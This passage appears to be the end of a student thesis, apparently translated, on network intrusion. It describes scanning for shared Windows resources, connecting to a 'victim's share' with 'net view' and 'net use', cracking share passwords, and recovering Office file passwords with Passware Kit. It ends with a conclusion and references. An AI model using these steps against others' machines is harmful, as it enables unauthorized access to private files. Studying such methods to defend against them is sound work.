Shared-resource scanner. To scan the shared resources on the target machine, this example uses the WS_Ping ProPack software with its Scan tool. Using WS_Ping ProPack one can thus learn the IP address of the machine holding the resource. There are many ways to access that resource; for example the command line Run \\<IP address>\<resource name> can be used. To see whether a resource is shared, the command C:\net view <IP address> is used. If the shared resource has no password, access proceeds normally: net use <any drive on your machine>: <victim's share>. If the resource is shared with a password, a password cracker, as described below, is used to crack the password and access the resource with the cracked password.

Passware Kit. Passware Kit recovers all kinds of passwords for the world's most popular office application files, including Excel, Word, WinZip, Windows XP/2000/NT, Access, Outlook, Quicken, WordPerfect, VBA, 1-2-3, ACT, Paradox, Organizer, Schedule, WordPro and more. The steps to recover the password of a Microsoft Office document are as follows.


To recover passwords for other file types, choose a different recovery module in step 1.
1. Click the Start button, then click Program, Passware, Office Key.
2. Choose Recover; the file selection dialog appears.
3. Choose the file whose password is to be found.
4. Press the Open button to start recovery.

CONCLUSION


After the theoretical study, the thesis has on the whole covered the basic content of the topic. Through this project I have come to understand to some extent how malicious software operates and the methods of intruding into private networks connected to the Internet. Despite much effort, since the Internet is an extremely broad subject and my time and ability were limited, the project still has many shortcomings and has not fully met the requirements the topic set out. My plan for developing the topic in the future is to overcome these limitations so that the work becomes ever more complete, and to produce a software product: a tool with application in network intrusion technology in particular and in information technology in general.


REFERENCES

[1] Network Security: Secrets and Solutions, translated by the VN_Guide group, Thong Ke Publishing House, 2000.
[2] Technical Report 2002: Microsoft IIS 4.0, 5.0 Extended Unicode Directory Traversal Vulnerability and Certification Effort, IRIA Tools.
[3] Microsoft Security Bulletin MS00-078.
[4] http://packetstorm.secuify.com
[5] http://www.tlsecurity.net
[6] http://www.securityfocus.com
[7] http://www.LostPassword.com
[8] http://www.ipswitch.com
